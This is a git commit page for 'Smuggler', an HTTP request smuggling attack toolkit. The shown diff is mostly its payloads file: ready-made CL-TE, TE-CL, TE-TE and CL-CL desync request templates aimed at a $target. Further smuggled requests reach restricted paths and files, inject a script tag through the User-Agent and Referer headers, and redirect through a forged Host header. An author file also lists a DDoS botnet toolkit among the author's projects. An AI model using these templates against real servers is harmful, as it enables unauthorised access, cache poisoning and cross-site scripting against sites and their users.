Selaa lähdekoodia

added more exploits

psy 2 vuotta sitten
vanhempi
commit
1fb5185836
4 muutettua tiedostoa jossa 398 lisäystä ja 93 poistoa
  1. 10 4
      README.md
  2. 7 3
      docs/AUTHOR
  3. 27 25
      payloads/payloads.py
  4. 354 61
      smuggler.py

+ 10 - 4
README.md

@@ -17,9 +17,13 @@
 
  This tool runs on many platforms and it requires Python (3.x.y).
 
-#### Executing:
+#### Launching:
   
-  python smuggler.py (or python3 smuggler.py)
+ python smuggler.py (or python3 smuggler.py)
+
+#### Exploiting:
+
+![c](https://03c8.net/images/smuggler_exploit.png)
 
 ----------
 
@@ -45,7 +49,9 @@
 
 ![c](https://03c8.net/images/smuggler_detection2.png)
 
-![c](https://03c8.net/images/smuggler_exploit.png)
-
 ![c](https://03c8.net/images/smuggler_exploit2.png)
 
+![c](https://03c8.net/images/smuggler_exploit3.png)
+
+![c](https://03c8.net/images/smuggler_exploit4.png)
+

+ 7 - 3
docs/AUTHOR

@@ -25,10 +25,13 @@
  - Collatz: Tool to simulate the Collatz's conjeture.
  - DiaNA: Tool for the search and recognition of patterns in DNA sequences.
  - DieKunstDerFuge: Video on different topics related to hacktivism recorded during 2013 from an intimate narrative perspective.
- - ECOin: Decentralized key/value registration and transfer system based on Bitcoin technology (a cryptocurrency).
- - Euler-Bricks: Tool to search for Euler's "bricks".
+ - ECOin: Crypto-currency with the goal of providing a long-term energy-efficient digital economy strategy.
+ - Euler-Bricks: Tool to simulate the Euler's conjeture.
+ - FuzzSSH: Tool to detect SSH (protocol) vulnerabilities.
  - Goldbach: Tool to simulate the Goldbach's conjeture.
- - Lorea: Social networking autonomous project to build a distributed, encrypted and federated network. 
+ - Lorea: Social networking autonomous project to build a distributed, encrypted and federated network.
+ - Neuralia: Neural Network that tries to learn and reply the correct answer.
+ - NoINIW-2051: Shell-based CyberPunk m-RPG videogame.
  - Orb: Tool for massive footprinting.
  - PandeMaths: Tool that simulates a mathematical model of pandemics.
  - pArAnoIA-Browser: Tool designed to surf the Internet using some "paranoic" methods.
@@ -36,6 +39,7 @@
  - PyAISnake: Tool to train AI models on solve spatial problems through the classic video game "snake".
  - PyDog4Apache: Tool to sneak logs from Apache web server.
  - Smuggler: Tool to detect and exploit HTTP Smuggling vulnerabilities.
+ - SolarNET.HuB: A sustainable multilayer tool-artifact for data privacy and project networking.
  - UFONet: Denial of Service [DDoS & DoS attacks] Toolkit (a botnet of botnets).
  - XSSer: Automatic -framework- to detect, exploit and report XSS vulnerabilities.
 

+ 27 - 25
payloads/payloads.py

@@ -1,39 +1,41 @@
 #!/usr/bin/env python3 
 # -*- coding: utf-8 -*-"
 """
-Smuggler (HTTP -Smuggling- Attack Toolkit) - 2020 - by psy (epsylon@riseup.net)
+Smuggler (HTTP -Smuggling- Attack Toolkit) - 2020/2022 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with PandeMaths; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 payloads={
-    'CL-CL-0#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\n\r\nY',
-    'CL-CL-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nContent-Length: 1\r\n\r\nY',
-    'CL-CL-2#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nContent-Length: 3\r\n\r\nY',
-    'TE-TE-0#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\n\r\nY',
-    'TE-TE-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: identity, cow\r\nTransfer-Encoding: chunked\r\n\r\nY',
-    'TE-TE-2#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: identity, cow\r\n\r\nY',
-    'TE-CL-0#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: 2\r\n\r\nY',
-    'TE-CL-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: 1\r\n\r\nY',
-    'CL-TE-0#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nTransfer-Encoding: chunked\r\n\r\nY',
-    'CL-TE-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1\r\nTransfer-Encoding: chunked\r\n\r\nY'
-	 }
+    'CL-CL-0#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\n\r\nY',
+    'CL-CL-1#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nContent-Length: 1\r\n\r\nY',
+    'CL-CL-2#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nContent-Length: 3\r\n\r\nY',
+    'TE-TE-0#Content-Type: application/x-www-form-urlencoded\r\nContent-length: 4\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
+    'TE-TE-1#Content-Type: application/x-www-form-urlencoded\r\nContent-length: 4\r\nTransfer-Encoding: identity, cow\r\nTransfer-encoding: chunked\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
+    'TE-TE-2#Content-Type: application/x-www-form-urlencoded\r\nContent-length: 4\r\nTransfer-Encoding: chunked\r\nTransfer-encoding: identity, cow\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
+    'TE-CL-0#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
+    'TE-CL-1#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 3\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
+    'CL-TE-0#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nY',
+    'CL-TE-1#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 5\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nY'
+     }
 exploits={
-    'CL-CL-0#$method $path HTTP/1.1\r\nHost: $target\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\n\r\n$SMUGGLED',
-    'CL-CL-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nContent-Length: 1\r\n\r\n$SMUGGLED',
-    'CL-CL-2#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nContent-Length: 3\r\n\r\n$SMUGGLED',
-    'TE-TE-0#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\n\r\n$SMUGGLED',
-    'TE-TE-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: identity, cow\r\nTransfer-Encoding: chunked\r\n\r\n$SMUGGLED',
-    'TE-TE-2#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: identity, cow\r\n\r\n$SMUGGLED',
-    'TE-CL-0#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: 2\r\n\r\n$SMUGGLED',
-    'TE-CL-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: 1\r\n\r\n$SMUGGLED',
-    'CL-TE-0#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nTransfer-Encoding: chunked\r\n\r\n$SMUGGLED',
-    'CL-TE-1#User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1\r\nTransfer-Encoding: chunked\r\n\r\n$SMUGGLED'
+    'CL-CL-0#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\n\r\n$SMUGGLED',
+    'CL-CL-1#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: $LC\r\n\r\n$SMUGGLED',
+    'CL-CL-2#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: $LC\r\n\r\n$SMUGGLED',
+    'TE-TE-0#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-length: $CL\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\n$SMUGGLEDPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
+    'TE-TE-1#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-length: $CL\r\nTransfer-Encoding: identity, cow\r\nTransfer-encoding: chunked\r\n\r\n5c\r\n$SMUGGLEDPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
+    'TE-TE-2#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-length: $CL\r\nTransfer-Encoding: chunked\r\nTransfer-encoding: identity, cow\r\n\r\n5c\r\n$SMUGGLEDPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
+    'TE-CL-0#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\r\n\r\n$SMUGGLED',
+    'TE-CL-1#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\r\n\r\n$SMUGGLED',
+    'CL-TE-0#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n$SMUGGLED',
+    'CL-TE-1#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n$SMUGGLED'
      }
 methods={
     '0#Y',
-    '1#GET $path HTTP/1.1\r\nHost: $target\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded',
-    '2#GET $restricted HTTP/1.1\r\nHost: $target\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded',
-    '3#GET $files HTTP/1.1\r\nHost: $target\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en-CA;q=0.7;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded'
+    '1#$method $path $protocol\r\nHost: $target\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\n\r\n$parameter=$SMUGGLED',
+    '2#GET $restricted HTTP/1.1\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nFoo: Y',
+    '3#GET $files HTTP/1.1\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL',
+    "4#GET $path HTTP/1.1\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nUser-Agent: <script>alert('$text')</script>\r\nReferer: <script>alert('$text')</script>\r\nFoo: Y",
+    "5#GET $PT HTTP/1.1\r\nHost: $redirect\r\n\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nFoo: Y\r\n\r\n"
      }

Tiedoston diff-näkymää rajattu, sillä se on liian suuri
+ 354 - 61
smuggler.py